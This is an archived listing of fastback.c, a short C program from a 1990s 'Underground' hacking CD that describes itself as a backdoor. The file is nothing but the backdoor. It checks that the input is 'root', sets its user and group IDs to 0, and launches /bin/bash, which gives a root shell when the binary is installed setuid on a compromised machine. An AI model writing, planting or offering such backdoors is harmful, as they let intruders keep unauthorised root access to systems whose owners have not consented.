home *** CD-ROM | disk | FTP | other *** search
/ Underground / Underground CD1.iso / hack / PDFAQ.ZIP / fastback.c < prev    next >
Encoding:
C/C++ Source or Header  |  1998-03-08  |  283 b   |  17 lines

  1. // fastback.c - by Permission Denied
  2. // very short backdoor with access control
  3.  
  4. #include <stdio.h>
  5.  
  6. main()
  7. {
  8.  char s[20];
  9.  fgets(s, 20, stdin);
  10.  if(strcmp(s,"root\n")!=0) {
  11.   fprintf(stderr, "Only root can run this!\n");
  12.   return;
  13.   }
  14.  setuid(0);
  15.  setgid(0);
  16.  system("/bin/bash");
  17. }